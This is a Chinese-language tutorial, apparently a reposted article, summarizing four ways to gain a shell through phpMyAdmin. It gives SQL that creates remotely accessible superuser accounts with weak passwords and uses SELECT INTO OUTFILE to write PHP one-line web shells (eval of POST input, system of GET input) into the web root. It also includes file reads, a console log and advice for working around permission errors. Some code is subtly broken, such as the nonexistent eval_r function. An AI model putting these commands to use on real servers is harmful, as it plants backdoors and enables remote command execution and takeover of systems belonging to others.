下面由phpmyadmin使用教學欄位來總結#phpmyadmin拿shell,希望對需要的朋友有幫助!
PHPmyadmin拿shell總結
#
PHPmyadmin修改使用者密碼
#直接點選上面的localhost或1270.0.1,出現用戶一欄,點選修改即可
新增超級使用者guetsec密碼ooxx並且允許外連
GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;
我們可以建立root帳號設定密碼
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
這樣就建立了root外聯帳戶,密碼123456,外鏈時用123456
拿shell四種經典方法:
方法一:
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL ); INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval_r($_POST[7on])?>'); SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php 一句话连接密码:7on
方法二:
读取文件内容: select load_file('E:/xamp/www/s.php'); 写一句话: select '<?php @eval_r($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php' cmd执行权限: select '<?php echo \'<pre class="brush:php;toolbar:false">\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
#方法三:
#JhackJ版本PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL); Insert INTO study (cmd) VALUES('<?php eval_r($_POST[cmd])?>'); select cmd from study into outfile 'E:/wamp/www/7.php'; Drop TABLE IF EXISTS study; <?php eval_r($_POST[cmd])?> -------------------------------------------------------------------------------- <?php @eval_r($_POST[cmd])?> CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 INSERT INTO study( cmd ) VALUES ('<?php eval_r($_POST[cmd])?>');# 影响列数: 1 SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1 DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
方法四:
select load_file('E:/xamp/www/study.php'); select '<?php echo \'<pre class="brush:php;toolbar:false">\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
然後造訪網站目錄:http://www.2cto.com/study.php?cmd=dir
Phpmyadmin匯出一句話時出現(Errcode: 13 - Permission denied)
是對此目錄沒有權限,可以試試上級目錄,或是下級目錄
再不行試試NTS引流
還有就是要注意目錄\
以上是總結PHPmyadmin拿shell的詳細內容。更多資訊請關注PHP中文網其他相關文章!